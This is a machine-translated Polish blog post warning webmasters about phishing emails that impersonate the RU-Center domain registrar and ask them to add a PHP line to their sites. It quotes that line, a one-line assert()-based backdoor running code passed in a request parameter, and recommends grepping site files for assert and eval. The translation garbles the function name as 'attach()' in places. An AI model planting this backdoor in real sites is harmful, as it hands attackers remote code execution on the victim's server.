Uwaga dla "webmasterów", którzy nie znają PHP. Słaby punkt.

To jest automatyczne tłumaczenie.
Kliknij tutaj, aby przeczytać publikację w oryginalnym języku.

Dzisiaj niektórzy z moich znajomych otrzymali listy, rzekomo od RU-Center (największego rosyjskiego rejestratora nazw domen) - nic.ru , o następującej treści:

Listy zostały wysłane z info@nic.technical . W liście napastnicy reprezentujący się w imieniu RU-Center sugerują umieszczenie na stronie następującego kodu:

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

Niestety, wielu naszych kolegów, którzy nazywają siebie „webmasterami” (liczni właściciele witryn), nie zna PHP i nie myśli o niebezpieczeństwach, jakie niesie powyższy kod. Jeśli przekażesz ciąg znaków jako parametr do tej funkcji, zostanie on potraktowany przez attach() jako kod PHP! Bądź ostrożny!

Zalecam sprawdzenie projektów php pod kątem luk w zabezpieczeniach za pomocą poleceń attach lub eval. Jeśli te polecenia są obecne w kodzie projektu, nie panikuj - przestudiuj ich algorytm. Autoryzowane użycie algorytmów jest całkiem możliwe. W przypadku powyższego przykładu polecenie pozwoli atakującym zadzwonić do Twojej witryny, na przykład za pomocą parametru RUCENTER - http://sistema-audit.ru/?RUCENTER=PHP-code

Zalecamy przeprowadzenie wyszukiwania za pomocą np. linuxowego polecenia grep -i -r 'assert' /home /www /mojastrona/* wskazującego folder z plikami witryny w celu uzyskania listy plików, w których podejrzane instancja jest używanym kodem.

Zadbaj o siebie i swoje strony!

To jest automatyczne tłumaczenie.
Kliknij tutaj, aby przeczytać publikację w oryginalnym języku.